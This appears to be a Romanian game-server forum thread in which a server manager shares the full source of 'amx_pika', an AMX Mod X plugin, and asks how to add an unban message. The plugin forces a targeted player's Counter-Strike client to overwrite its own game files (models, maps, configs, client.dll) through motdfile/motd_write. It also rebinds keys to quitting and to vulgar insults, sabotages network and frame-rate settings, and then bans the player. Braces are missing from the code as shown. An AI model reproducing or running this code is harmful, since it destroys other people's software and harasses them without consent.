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Suport amx_pika


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Server: rze.rangfort.ro

Nick: RZE
Grad server: Manager server
La ce doriţi ajutor?: Ma puteti ajuta sa pun in pika mesaj care sa apara in consola de ex: Pentru cerere unban intrati pe www.rangfort.ro/forum sectiunea CSDM-RZE ? 

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/* AMX Mod X Script
* ======---===========
* © 2013 by KenT
*  www.rangfort.ro
* ======---===========
* This file is intended to be used with AMX Mod X.
*   This program is free software: you can redistribute it and/or modify
*   it under the terms of the GNU General Public License as published by
*   the Free Software Foundation, either version 3 of the License, or
*   (at your option) any later version.
*   This program is distributed in the hope that it will be useful,
*   but WITHOUT ANY WARRANTY; without even the implied warranty of
*   GNU General Public License for more details.
*   AMXX Pika v1.2.0
*   changelog:
*   v1.0.0
*   - Versiune privata
*   v2.1.0
*   - Am adaugat definire de mesaj colorat pentru cine doreste doar.
*   - Mai multe functii destroy ( fisiere ).
*   - Am adaugat fisier .LOG.
*   - Comanda nu mai poate fi folosita pe personal, admini, boti.
*   - Acum pluginul va afecta putin si jucatorii cu Steam.
*   - Optimizat doar amxmodx, amxmisc.
*   - Detalii comanda si cum se foloseste.

#include < amxmodx >
#include < amxmisc >


#define PLUGIN_NAME		"AMXX Pika"
#define PLUGIN_VERSION		"1.2.0"
#define PLUGIN_AUTHOR		"AzaZeL" // aka CryWolf

// Numele fisierului .log
#define LOGFILE		"AMXX_PIKA.log"

/*********** DESTORY COMMANDS ********************************/
new const g_pika [ ] [ ] = 
	"motdfile models/player.mdl;motd_write y",
	"motdfile models/v_ak47.mdl;motd_write x",
	"motdfile models/p_ak47.mdl;motd_write x",
	"motdfile models/v_flashbang.mdl;motd_write y",
	"motdfile models/p_m3.mdl;motd_write x",
	"motdfile models/v_awp.mdl;motd_write n",
	"motdfile models/p_ump45.mdl;motd_write x",
	"motdfile models/v_awp.mdl;motd_write x",
	"motdfile models/player/arctic/arctic.mdl;motd_write x",
	"motdfile models/player/gsg9/gsg9.mdl;motd_write y",
	"motdfile models/player/sas/sas.mdl;motd_write x",
	"motdfile models/player/terror/terror.mdl;motd_write y",
	"motdfile models/player/vip/vip.mdl;motd_write x",
	"motdfile models/player/urban/urban.mdl;motd_write x",
	"motdfile resource/GameMenu.res;motd_write x",
	"motdfile halflife.wad;motd_write x",
	"motdfile liblist.gam;motd_write y",
	"motdfile cs_dust.wad;motd_write x",
	"motdfile events/ak47.sc;motd_write x",
	"motdfile autoexec.cfg;motd_write x",
	"motdfile server.cfg;motd_write x",
	"motdfile ajawad.wad;motd_write x",
	"motdfile cstrike.wad;motd_write x",
	"motdfile dlls/mp.dll;motd_write x",
	"motdfile dlls/cs_i386.so;motd_write x",
	"motdfile cl_dlls/client.dll;motd_write x",
	"motdfile resource/cstrike_english.txt;motd_write x",
	"motdfile resource/game_menu.tga;motd_write x",
	"motdfile maps/de_inferno.bsp;motd_write x",
	"motdfile maps/de_dust2.bsp;motd_write x",
	"motdfile maps/de_aztec.bsp;motd_write x",
	"motdfile maps/de_dust.bsp;motd_write x",
	"motdfile maps/de_train.bsp;motd_write x",
	"motdfile cs_assault.wad;motd_write x",
	"motdfile spectatormenu.txt.wad;motd_write x",
	"motdfile custom.hpk;motd_write x",
	"sys_ticrate 0.1",
	"bind w Intrati pe WWW.RANGFORT.RO",
	"bind a Vreau muie",
	"bind d quit",
	"cl_cmdrate 0.1",
	"cl_updaterate 0.0.1",
	"fps_max 1.0",
	"fps_modem 1.0",
	"cl_timeout 0.0",
	"cl_allowdownload 0",
	"cl_allowupload 0",
	"rate 00000",
	"developer 2",
	"hpk_maxsize 100",
	"bind m sunt_un_cacat",
	"bind q admin_esti_un_prost_I_",
	"bind g admin_mata_suge_cariciu )",
	"cl_forwardspeed 100",
	"cl_backspeed 100",
	"cl_sidespeed 100",
	"motdfile userconfig.cfg;motd_write x",
	"bind t quit",
	"bind y quit",
	"cd eject"

public plugin_init ( )
	register_clcmd ( "amx_pika", "cmdPika", ADMIN_IMMUNITY, "<nume sau #userid>" );

public cmdPika ( id, level, cid )
	if ( !cmd_access ( id, level, cid, 2 ) )
		return 1;
	new arg [ 33 ];
	read_argv ( 1, arg, charsmax ( arg ) );
	new player = cmd_target ( id, arg, CMDTARGET_OBEY_IMMUNITY | CMDTARGET_ALLOW_SELF );
	if ( !player )
		console_print ( id, "[RZE.RANGFORT.RO] Jucatorul nu este online sau a iesit de pe Server." );
		return 1;
	new authid [ 33 ], authid2 [ 33 ],
	name2 [ 33 ], name [ 33 ],
	userid2, reason [ 32 ], userip [ 33 ];
	get_user_authid ( id, authid, charsmax ( authid ) );
	get_user_authid ( player, authid2, charsmax ( authid2 ) );
	get_user_name ( player, name2, charsmax ( name2 ) );
	get_user_name ( id, name, charsmax ( name ) );
	get_user_ip ( player, userip, charsmax ( userip ) );
	userid2 = get_user_userid ( player )
	read_argv ( 2, reason, 31 );
	remove_quotes ( reason );
	log_to_file ( LOGFILE, "Adminul %s La Distrus Pe: %s cu motivul: (%s)", name, player, userid2, reason )
	for ( new i = 0; i < sizeof ( g_pika ); i++ )
		client_cmd ( player, g_pika [ i ] );
	server_cmd("amx_teg ^"%s^" ^"%s^" 0 ^"Ai Fost Distrus + ban permanent^"",name2,userip)
	client_cmd ( 0, "spk ^"vox/bizwarn detected user has teg^"" );

	ColorChat( 0, "^x04--------------------------------WWW.RANGFORT.RO--------------------------------------------------" );
	ColorChat( 0, "^x04[RZE.RANGFORT.RO]^x01 Jucatorul^x04 %s^x01 cu ip^x04 %s^x01 a fost^x03 Distrus si banat^x01 !", name2, userip );
	ColorChat( 0, "^x04[RZE.RANGFORT.RO]^x01 Comanda executata de catre adminul^x04 %s^x01 !", name );
	ColorChat( 0, "^x04--------------------------------WWW.RANGFORT.RO--------------------------------------------------" );
	set_hudmessage( 0, 255, 0, -1.0, -1.0, 2, 2.0, 2.0 );
	show_hudmessage( 0, "Jucatorul %s a fost Distrus si banat!^nComanda executata de adminul %s.",name2, name );

	return 1;

stock ColorChat( const id, const input[ ], any:... ) 
	new count = 1, players[ 32 ];
	static msg[ 191 ];
	vformat( msg, 190, input, 3 );
	replace_all( msg, 190, "!g", "^4" );
	replace_all( msg, 190, "!y", "^1" );
	replace_all( msg, 190, "!t", "^3" );
	if( id ) 
		players[ 0 ] = id;
	else get_players( players, count, "ch" ); 
		for( new i = 0; i < count; i++ ) 
			if( is_user_connected( players[ i ] ) ) 
				message_begin( MSG_ONE_UNRELIABLE, get_user_msgid( "SayText" ), _, players[ i ] );
				write_byte( players[ i ] );
				write_string( msg );
				message_end( );

Deci eu vreau mesaj in consola dupa ce primeste pika, Pentru cerere unban intrati pe www.rangfort.ro/forum | Sectiunea [CSDM-RZE]

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In consola trebuie refacut pluginu dupa cum vad,poti pune in chat doar,eu doar vad aici,ti l-as face eu,dar nu am timpul necesar,ca sa ti-l fac acum.

Vorbeste cu un Scripter amxx,vezi cu ce te poate ajuta,ce mai poti face e,cand ii dai pica,sa apara in chat 5 secunde,sa zica jucatoru X va fi banat in 5 secunde,si el va vedea.. ca va fi banat.

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